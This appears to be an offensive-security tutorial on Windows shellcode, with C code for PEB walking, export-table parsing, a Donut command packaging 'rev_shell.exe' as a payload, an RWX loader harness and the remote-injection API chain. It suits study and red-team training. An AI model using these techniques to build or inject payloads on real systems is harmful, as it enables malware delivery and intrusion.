Shellcode on Windows



~ lululufr

CONTENTS

  0  the problem — aslr and no fixed addresses
  1  why not use syscalls directly
  2  finding kernel32.dll at runtime
  3  parsing the export directory
  4  donut — pe to shellcode
  5  testing a shellcode

──[ 0. The Problem — ASLR and No Fixed Addresses ]──

A shellcode lands in a memory region whose address is unknown at compile time — 
thanks to ASLR.

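ASLR randomises the base addresses of the stack, the heap, and every loaded
module. On Windows, stack and heap placement changes per process, while system
DLL bases are typically picked once per boot. Either way, your shellcode can't
rely on hardcoded absolute addresses such as JMP 0x12345678: they'd crash on
the spot.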

So the shellcode has to be Position Independent Code (PIC): it uses only
relative addressing internally and resolves everything else it needs
dynamically at runtime.

──[ 1. Why Not Use Syscalls Directly ]──

On Linux, shellcodes call the kernel directly with the syscall instruction and 
hardcoded numbers. Simple, portable.

On Windows, that doesn't fly:

    - SSNs (System Service Numbers, the Native API syscall numbers) can
      change between OS versions (XP → 7 → 10 → 11) and even between builds.
      An SSN hardcoded for NtAllocateVirtualMemory on one release is not
      guaranteed to be valid on another.
    - Microsoft doesn't document or guarantee SSN stability.

The portable way is to go through the system DLLs, whose exported function
names stay stable across versions:

    kernel32.dll — memory management, process/thread creation, DLL loading
    ntdll.dll    — thin bridge to the kernel (Native API)

──[ 2. Finding kernel32.dll at Runtime ]──

The shellcode needs kernel32.dll's base address so it can grab GetProcAddress
and then find everything else. The trick uses the TEB (Thread Environment
Block) and the PEB (Process Environment Block), two structures Windows keeps
in predictable places.

flowchart TD
    A["FS:[0x30] (x86)\nGS:[0x60] (x64)"] --> B[PEB]
    B --> C[PEB.Ldr]
    C --> D[InMemoryOrderModuleList]
    D --> E["[0] — executable itself"]
    E --> F["[1] — ntdll.dll"]
    F --> G["[2] — kernel32.dll ← base address here"]

Steps:

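    1. Read the TEB through the FS (x86) or GS (x64) segment register.
    2. The TEB holds a pointer to the PEB at a known offset: FS:[0x30] on
       x86, GS:[0x60] on x64.
    3. PEB.Ldr points to PEB_LDR_DATA, which holds InMemoryOrderModuleList.
    4. Walk the list: entry 0 is the exe, entry 1 is ntdll.dll, entry 2
       is kernel32.dll. Each link points at the InMemoryOrderLinks field
       inside an LDR_DATA_TABLE_ENTRY, not at the start of the entry, so
       adjust by that field's offset before reading DllBase, the module's
       base address.

This order has held for standard processes on modern Windows versions, but it
is a loader convention rather than a documented guarantee. A more defensive
stub compares each entry's BaseDllName instead of trusting the index.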
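
The list walk in step 4 can be sketched in portable C. This is only an
illustration under stated assumptions: list_entry and ldr_entry are simplified
stand-ins for LIST_ENTRY and LDR_DATA_TABLE_ENTRY (modelling just the leading
fields, in the order they appear on x64), and nth_module_base is a hypothetical
helper name. The list head is passed in as a parameter so the code runs
anywhere; on a real target it would be the InMemoryOrderModuleList field
reached through PEB.Ldr.

```c
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-in for LIST_ENTRY: a node of a circular doubly linked list. */
typedef struct list_entry {
    struct list_entry *flink;   /* next node */
    struct list_entry *blink;   /* previous node */
} list_entry;

/* Simplified stand-in for LDR_DATA_TABLE_ENTRY (assumption: only the
   leading fields are modelled, nothing after dll_base). */
typedef struct ldr_entry {
    list_entry in_load_order_links;
    list_entry in_memory_order_links;   /* the list walked below */
    list_entry in_init_order_links;
    void      *dll_base;                /* module base address */
} ldr_entry;

/* Return dll_base of the index-th module on the in-memory-order list,
   or NULL if the list has fewer entries than that. */
void *nth_module_base(list_entry *head, unsigned index)
{
    list_entry *node;

    for (node = head->flink; node != head; node = node->flink, index--) {
        if (index == 0) {
            /* The link sits inside the entry, so step back by the
               field's offset to recover the start of the entry. */
            ldr_entry *entry = (ldr_entry *)
                ((char *)node - offsetof(ldr_entry, in_memory_order_links));
            return entry->dll_base;
        }
    }
    return NULL;   /* walked back to the head without reaching index */
}
```

With the ordering described above, nth_module_base(head, 2) would yield the
kernel32.dll base. The offsetof adjustment is the part that is easy to get
wrong when the same walk is written by hand in assembly.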

──[ 3. Parsing the Export Directory ]──

With kernel32.dll located, the shellcode has to find GetProcAddress inside it. 
That means parsing the PE export table by hand.

    1. At offset 0x3C from DLL base: e_lfanew — offset to NT Headers.
    2. NT Headers → Optional Header → DataDirectory[0]: Export Directory RVA.
    3. IMAGE_EXPORT_DIRECTORY references three arrays:

        AddressOfNames         RVAs of function name strings
        AddressOfNameOrdinals  16-bit index into AddressOfFunctions, one
                               per name
        AddressOfFunctions     RVAs of the actual function code

       The first two are parallel (entry i of one matches entry i of the
       other); AddressOfFunctions is indexed by the ordinal value.

    4. Loop over AddressOfNames and compare each string with
       "GetProcAddress". When it matches at index i, read
       AddressOfNameOrdinals[i], use that value to index AddressOfFunctions,
       and add the DLL base to the resulting RVA to get the VA.
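
The four steps above can be sketched as a small C routine. It is a minimal
sketch, not a drop-in stub: find_export_rva, rd32 and rd16 are hypothetical
names, the image is assumed to be already mapped (so RVAs can be added to the
base directly), the host is assumed little-endian, and forwarded exports are
not handled. It also leans on memcpy and strcmp for brevity, which real
shellcode could not import and would have to inline.

```c
#include <stdint.h>
#include <string.h>

/* Read fields without alignment assumptions (little-endian host assumed). */
uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, sizeof v); return v; }
uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, sizeof v); return v; }

/* Look up an export by name in a mapped PE image.
   Returns the function's RVA, or 0 if the name is not found. */
uint32_t find_export_rva(const uint8_t *base, const char *wanted)
{
    /* Step 1: e_lfanew at 0x3C gives the offset of the NT headers. */
    const uint8_t *nt = base + rd32(base + 0x3C);
    if (rd32(nt) != 0x00004550)              /* "PE\0\0" signature */
        return 0;

    /* Step 2: optional header follows the 4-byte signature and the
       20-byte file header; DataDirectory[0] is the export directory. */
    const uint8_t *opt = nt + 24;
    uint16_t magic = rd16(opt);
    uint32_t dir_off;
    if (magic == 0x20B)      dir_off = 112;  /* PE32+ (64-bit) */
    else if (magic == 0x10B) dir_off = 96;   /* PE32  (32-bit) */
    else return 0;

    uint32_t exp_rva = rd32(opt + dir_off);
    if (exp_rva == 0)
        return 0;                            /* image exports nothing */
    const uint8_t *exp = base + exp_rva;

    /* Step 3: the three arrays referenced by IMAGE_EXPORT_DIRECTORY. */
    uint32_t n_names     = rd32(exp + 24);          /* NumberOfNames */
    const uint8_t *funcs = base + rd32(exp + 28);   /* AddressOfFunctions */
    const uint8_t *names = base + rd32(exp + 32);   /* AddressOfNames */
    const uint8_t *ords  = base + rd32(exp + 36);   /* AddressOfNameOrdinals */

    /* Step 4: match the name, then go name index -> ordinal -> RVA. */
    for (uint32_t i = 0; i < n_names; i++) {
        const char *name = (const char *)(base + rd32(names + 4 * i));
        if (strcmp(name, wanted) == 0) {
            uint16_t ord = rd16(ords + 2 * i);
            return rd32(funcs + 4 * ord);
        }
    }
    return 0;
}
```

Adding the returned RVA to the module base gives the callable address. Reading
fields by offset rather than through struct definitions keeps the sketch close
to what the equivalent assembly does.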

Once you have GetProcAddress, it resolves any other export by name given a
module's base address. Resolving LoadLibraryA first lets the shellcode pull in
DLLs that aren't loaded yet.

──[ 4. Donut — PE to Shellcode ]──

Writing the PEB-walking and export-parsing stubs by hand in assembly is tedious.
The open-source tool Donut (github.com/TheWover/donut) does the whole thing:
feed it a PE (EXE or DLL) and it wraps it in a position-independent shellcode
loader.

    ./donut.exe -i "rev_shell.exe" -a 3 -f 3 -o payload.c

    -i    input file (PE)
    -a 3  architecture: x86+amd64 dual-mode (use -a 2 for x64 only)
    -f 3  output format: C array
    -o    output file

Donut embeds the PE, optionally compresses it, handles relocations, resolves
imports at runtime, and calls the entry point, all in a self-contained
shellcode blob.

──[ 5. Testing a Shellcode ]──

Minimal in-process test harness:

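    #include <windows.h>

    /* Raw shellcode bytes (e.g. pasted from Donut's C output).
       Placeholder: a single RET so the harness returns cleanly. */
    unsigned char buf[] = { 0xC3 };

    int main(void) {
        // Allocate RWX memory
        void* mem = VirtualAlloc(
            NULL,
            sizeof(buf),
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE
        );
        if (mem == NULL) {
            return 1;   // allocation failed
        }

        // Copy shellcode
        RtlMoveMemory(mem, buf, sizeof(buf));

        // Execute as a function pointer
        ((void(*)(void))mem)();

        VirtualFree(mem, 0, MEM_RELEASE);
        return 0;
    }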

buf[] holds the raw shellcode bytes (e.g. from Donut).

Simple loader: alloc an RWX page, copy bytes, call into it. In a real injection 
scenario you'd do the same in a remote process: VirtualAllocEx + 
WriteProcessMemory + CreateRemoteThread.

